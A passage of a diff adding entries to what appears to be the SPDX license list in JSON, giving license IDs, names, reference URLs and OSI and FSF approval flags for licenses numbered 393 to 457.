+ "licenseId": "GPL-2.0-with-font-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-faq.html#FontException"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-2.1.json",
+ "referenceNumber": 393,
+ "name": "Open Software License 2.1",
+ "licenseId": "OSL-2.1",
+ "seeAlso": [
+ "http://web.archive.org/web/20050212003940/http://www.rosenlaw.com/osl21.htm",
+ "https://opensource.org/licenses/OSL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.3a.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.3a.json",
+ "referenceNumber": 394,
+ "name": "LaTeX Project Public License v1.3a",
+ "licenseId": "LPPL-1.3a",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-3a.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NAIST-2003.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NAIST-2003.json",
+ "referenceNumber": 395,
+ "name": "Nara Institute of Science and Technology License (2003)",
+ "licenseId": "NAIST-2003",
+ "seeAlso": [
+ "https://enterprise.dejacode.com/licenses/public/naist-2003/#license-text",
+ "https://github.com/nodejs/node/blob/4a19cc8947b1bba2b2d27816ec3d0edf9b28e503/LICENSE#L343"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.json",
+ "referenceNumber": 396,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 4.0 International",
+ "licenseId": "CC-BY-NC-ND-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.json",
+ "referenceNumber": 397,
+ "name": "Creative Commons Attribution Non Commercial 3.0 Germany",
+ "licenseId": "CC-BY-NC-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1+.json",
+ "referenceNumber": 398,
+ "name": "GNU Library General Public License v2.1 or later",
+ "licenseId": "LGPL-2.1+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OPL-1.0.json",
+ "referenceNumber": 399,
+ "name": "Open Public License v1.0",
+ "licenseId": "OPL-1.0",
+ "seeAlso": [
+ "http://old.koalateam.com/jackaroo/OPL_1_0.TXT",
+ "https://fedoraproject.org/wiki/Licensing/Open_Public_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/HPND-sell-variant.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HPND-sell-variant.json",
+ "referenceNumber": 400,
+ "name": "Historical Permission Notice and Disclaimer - sell variant",
+ "licenseId": "HPND-sell-variant",
+ "seeAlso": [
+ "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/sunrpc/auth_gss/gss_generic_token.c?h\u003dv4.19"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/QPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/QPL-1.0.json",
+ "referenceNumber": 401,
+ "name": "Q Public License 1.0",
+ "licenseId": "QPL-1.0",
+ "seeAlso": [
+ "http://doc.qt.nokia.com/3.3/license.html",
+ "https://opensource.org/licenses/QPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.2.json",
+ "referenceNumber": 402,
+ "name": "European Union Public License 1.2",
+ "licenseId": "EUPL-1.2",
+ "seeAlso": [
+ "https://joinup.ec.europa.eu/page/eupl-text-11-12",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl_v1.2_en.pdf",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/2020-03/EUPL-1.2%20EN.txt",
+ "https://joinup.ec.europa.eu/sites/default/files/inline-files/EUPL%20v1_2%20EN(1).txt",
+ "http://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri\u003dCELEX:32017D0863",
+ "https://opensource.org/licenses/EUPL-1.2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.json",
+ "referenceNumber": 403,
+ "name": "GNU Free Documentation License v1.2 or later - no invariants",
+ "licenseId": "GFDL-1.2-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/eCos-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/eCos-2.0.json",
+ "referenceNumber": 404,
+ "name": "eCos license version 2.0",
+ "licenseId": "eCos-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/ecos-license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NCGL-UK-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NCGL-UK-2.0.json",
+ "referenceNumber": 405,
+ "name": "Non-Commercial Government Licence",
+ "licenseId": "NCGL-UK-2.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/non-commercial-government-licence/version/2/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Beerware.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Beerware.json",
+ "referenceNumber": 406,
+ "name": "Beerware License",
+ "licenseId": "Beerware",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Beerware",
+ "https://people.freebsd.org/~phk/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.json",
+ "referenceNumber": 407,
+ "name": "BSD 3-Clause Open MPI variant",
+ "licenseId": "BSD-3-Clause-Open-MPI",
+ "seeAlso": [
+ "https://www.open-mpi.org/community/license.php",
+ "http://www.netlib.org/lapack/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.json",
+ "referenceNumber": 408,
+ "name": "GNU General Public License v2.0 w/Bison exception",
+ "licenseId": "GPL-2.0-with-bison-exception",
+ "seeAlso": [
+ "http://git.savannah.gnu.org/cgit/bison.git/tree/data/yacc.c?id\u003d193d7c7054ba7197b0789e14965b739162319b5e#n141"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-B.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-B.json",
+ "referenceNumber": 409,
+ "name": "CeCILL-B Free Software License Agreement",
+ "licenseId": "CECILL-B",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.json",
+ "referenceNumber": 410,
+ "name": "GNU General Public License v2.0 w/Autoconf exception",
+ "licenseId": "GPL-2.0-with-autoconf-exception",
+ "seeAlso": [
+ "http://ac-archive.sourceforge.net/doc/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPL-2.0.json",
+ "referenceNumber": 411,
+ "name": "Eclipse Public License 2.0",
+ "licenseId": "EPL-2.0",
+ "seeAlso": [
+ "https://www.eclipse.org/legal/epl-2.0",
+ "https://www.opensource.org/licenses/EPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-feh.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-feh.json",
+ "referenceNumber": 412,
+ "name": "feh License",
+ "licenseId": "MIT-feh",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#feh"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPL-1.1.json",
+ "referenceNumber": 413,
+ "name": "Reciprocal Public License 1.1",
+ "licenseId": "RPL-1.1",
+ "seeAlso": [
+ "https://opensource.org/licenses/RPL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Permissive-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-1.0.json",
+ "referenceNumber": 414,
+ "name": "Community Data License Agreement Permissive 1.0",
+ "licenseId": "CDLA-Permissive-1.0",
+ "seeAlso": [
+ "https://cdla.io/permissive-1-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Python-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Python-2.0.json",
+ "referenceNumber": 415,
+ "name": "Python License 2.0",
+ "licenseId": "Python-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Python-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-1.0.json",
+ "referenceNumber": 416,
+ "name": "Mozilla Public License 1.0",
+ "licenseId": "MPL-1.0",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/MPL-1.0.html",
+ "https://opensource.org/licenses/MPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-or-later.json",
+ "referenceNumber": 417,
+ "name": "GNU Free Documentation License v1.1 or later",
+ "licenseId": "GFDL-1.1-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/diffmark.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/diffmark.json",
+ "referenceNumber": 418,
+ "name": "diffmark license",
+ "licenseId": "diffmark",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/diffmark"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0+.json",
+ "referenceNumber": 419,
+ "name": "GNU General Public License v1.0 or later",
+ "licenseId": "GPL-1.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OpenSSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OpenSSL.json",
+ "referenceNumber": 420,
+ "name": "OpenSSL License",
+ "licenseId": "OpenSSL",
+ "seeAlso": [
+ "http://www.openssl.org/source/license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-1.0.json",
+ "referenceNumber": 421,
+ "name": "Open Software License 1.0",
+ "licenseId": "OSL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/OSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Parity-6.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Parity-6.0.0.json",
+ "referenceNumber": 422,
+ "name": "The Parity Public License 6.0.0",
+ "licenseId": "Parity-6.0.0",
+ "seeAlso": [
+ "https://paritylicense.com/versions/6.0.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0.json",
+ "referenceNumber": 423,
+ "name": "Affero General Public License v1.0",
+ "licenseId": "AGPL-1.0",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/YPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/YPL-1.1.json",
+ "referenceNumber": 424,
+ "name": "Yahoo! Public License v1.1",
+ "licenseId": "YPL-1.1",
+ "seeAlso": [
+ "http://www.zimbra.com/license/yahoo_public_license_1.1.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSH-short.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSH-short.json",
+ "referenceNumber": 425,
+ "name": "SSH short notice",
+ "licenseId": "SSH-short",
+ "seeAlso": [
+ "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/pathnames.h",
+ "http://web.mit.edu/kolya/.f/root/athena.mit.edu/sipb.mit.edu/project/openssh/OldFiles/src/openssh-2.9.9p2/ssh-add.1",
+ "https://joinup.ec.europa.eu/svn/lesoll/trunk/italc/lib/src/dsa_key.cpp"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IBM-pibs.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IBM-pibs.json",
+ "referenceNumber": 426,
+ "name": "IBM PowerPC Initialization and Boot Software",
+ "licenseId": "IBM-pibs",
+ "seeAlso": [
+ "http://git.denx.de/?p\u003du-boot.git;a\u003dblob;f\u003darch/powerpc/cpu/ppc4xx/miiphy.c;h\u003d297155fdafa064b955e53e9832de93bfb0cfb85b;hb\u003d9fab4bf4cc077c21e43941866f3f2c196f28670d"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Xnet.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Xnet.json",
+ "referenceNumber": 427,
+ "name": "X.Net License",
+ "licenseId": "Xnet",
+ "seeAlso": [
+ "https://opensource.org/licenses/Xnet"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TU-Berlin-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TU-Berlin-1.0.json",
+ "referenceNumber": 428,
+ "name": "Technische Universitaet Berlin License 1.0",
+ "licenseId": "TU-Berlin-1.0",
+ "seeAlso": [
+ "https://github.com/swh/ladspa/blob/7bf6f3799fdba70fda297c2d8fd9f526803d9680/gsm/COPYRIGHT"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0.json",
+ "referenceNumber": 429,
+ "name": "GNU Affero General Public License v3.0",
+ "licenseId": "AGPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CAL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CAL-1.0.json",
+ "referenceNumber": 430,
+ "name": "Cryptographic Autonomy License 1.0",
+ "licenseId": "CAL-1.0",
+ "seeAlso": [
+ "http://cryptographicautonomylicense.com/license-text.html",
+ "https://opensource.org/licenses/CAL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-3.0.json",
+ "referenceNumber": 431,
+ "name": "Academic Free License v3.0",
+ "licenseId": "AFL-3.0",
+ "seeAlso": [
+ "http://www.rosenlaw.com/AFL3.0.htm",
+ "https://opensource.org/licenses/afl-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-C.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-C.json",
+ "referenceNumber": 432,
+ "name": "CeCILL-C Free Software License Agreement",
+ "licenseId": "CECILL-C",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-3.0.json",
+ "referenceNumber": 433,
+ "name": "Open Government Licence v3.0",
+ "licenseId": "OGL-UK-3.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Clear.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Clear.json",
+ "referenceNumber": 434,
+ "name": "BSD 3-Clause Clear License",
+ "licenseId": "BSD-3-Clause-Clear",
+ "seeAlso": [
+ "http://labs.metacarta.com/license-explanation.html#license"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Modification.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Modification.json",
+ "referenceNumber": 435,
+ "name": "BSD 3-Clause Modification",
+ "licenseId": "BSD-3-Clause-Modification",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:BSD#Modification_Variant"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.json",
+ "referenceNumber": 436,
+ "name": "Creative Commons Attribution Share Alike 2.0 England and Wales",
+ "licenseId": "CC-BY-SA-2.0-UK",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.0/uk/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Saxpath.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Saxpath.json",
+ "referenceNumber": 437,
+ "name": "Saxpath License",
+ "licenseId": "Saxpath",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Saxpath_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLPL.json",
+ "referenceNumber": 438,
+ "name": "No Limit Public License",
+ "licenseId": "NLPL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/NLPL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SimPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SimPL-2.0.json",
+ "referenceNumber": 439,
+ "name": "Simple Public License 2.0",
+ "licenseId": "SimPL-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/SimPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/psfrag.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/psfrag.json",
+ "referenceNumber": 440,
+ "name": "psfrag License",
+ "licenseId": "psfrag",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/psfrag"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-86.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-86.json",
+ "referenceNumber": 441,
+ "name": "Spencer License 86",
+ "licenseId": "Spencer-86",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OCCT-PL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OCCT-PL.json",
+ "referenceNumber": 442,
+ "name": "Open CASCADE Technology Public License",
+ "licenseId": "OCCT-PL",
+ "seeAlso": [
+ "http://www.opencascade.com/content/occt-public-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-S-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-S-2.0.json",
+ "referenceNumber": 443,
+ "name": "CERN Open Hardware Licence Version 2 - Strongly Reciprocal",
+ "licenseId": "CERN-OHL-S-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ErlPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ErlPL-1.1.json",
+ "referenceNumber": 444,
+ "name": "Erlang Public License v1.1",
+ "licenseId": "ErlPL-1.1",
+ "seeAlso": [
+ "http://www.erlang.org/EPLICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-CMU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-CMU.json",
+ "referenceNumber": 445,
+ "name": "CMU License",
+ "licenseId": "MIT-CMU",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:MIT?rd\u003dLicensing/MIT#CMU_Style",
+ "https://github.com/python-pillow/Pillow/blob/fffb426092c8db24a5f4b6df243a8a3c01fb63cd/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NIST-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NIST-PD.json",
+ "referenceNumber": 446,
+ "name": "NIST Public Domain Notice",
+ "licenseId": "NIST-PD",
+ "seeAlso": [
+ "https://github.com/tcheneau/simpleRPL/blob/e645e69e38dd4e3ccfeceb2db8cba05b7c2e0cd3/LICENSE.txt",
+ "https://github.com/tcheneau/Routing/blob/f09f46fcfe636107f22f2c98348188a65a135d98/README.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-2.0.json",
+ "referenceNumber": 447,
+ "name": "Open Software License 2.0",
+ "licenseId": "OSL-2.0",
+ "seeAlso": [
+ "http://web.archive.org/web/20041020171434/http://www.rosenlaw.com/osl2.0.html"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-2.0.json",
+ "referenceNumber": 448,
+ "name": "Apple Public Source License 2.0",
+ "licenseId": "APSL-2.0",
+ "seeAlso": [
+ "http://www.opensource.apple.com/license/apsl/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Leptonica.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Leptonica.json",
+ "referenceNumber": 449,
+ "name": "Leptonica License",
+ "licenseId": "Leptonica",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Leptonica"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.json",
+ "referenceNumber": 450,
+ "name": "PolyForm Small Business License 1.0.0",
+ "licenseId": "PolyForm-Small-Business-1.0.0",
+ "seeAlso": [
+ "https://polyformproject.org/licenses/small-business/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-P-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-P-1.1.json",
+ "referenceNumber": 451,
+ "name": "Licence Libre du Québec – Permissive version 1.1",
+ "licenseId": "LiLiQ-P-1.1",
+ "seeAlso": [
+ "https://forge.gouv.qc.ca/licence/fr/liliq-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-P-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NetCDF.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NetCDF.json",
+ "referenceNumber": 452,
+ "name": "NetCDF license",
+ "licenseId": "NetCDF",
+ "seeAlso": [
+ "http://www.unidata.ucar.edu/software/netcdf/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OML.json",
+ "referenceNumber": 453,
+ "name": "Open Market License",
+ "licenseId": "OML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Open_Market_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-or-later.json",
+ "referenceNumber": 454,
+ "name": "GNU Affero General Public License v3.0 or later",
+ "licenseId": "AGPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.json",
+ "referenceNumber": 455,
+ "name": "Open LDAP Public License v2.2",
+ "licenseId": "OLDAP-2.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d470b0c18ec67621c85881b2733057fecf4a1acc3"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause.json",
+ "referenceNumber": 456,
+ "name": "BSD 3-Clause \"New\" or \"Revised\" License",
+ "licenseId": "BSD-3-Clause",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSD-3-Clause"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/WTFPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/WTFPL.json",
+ "referenceNumber": 457,
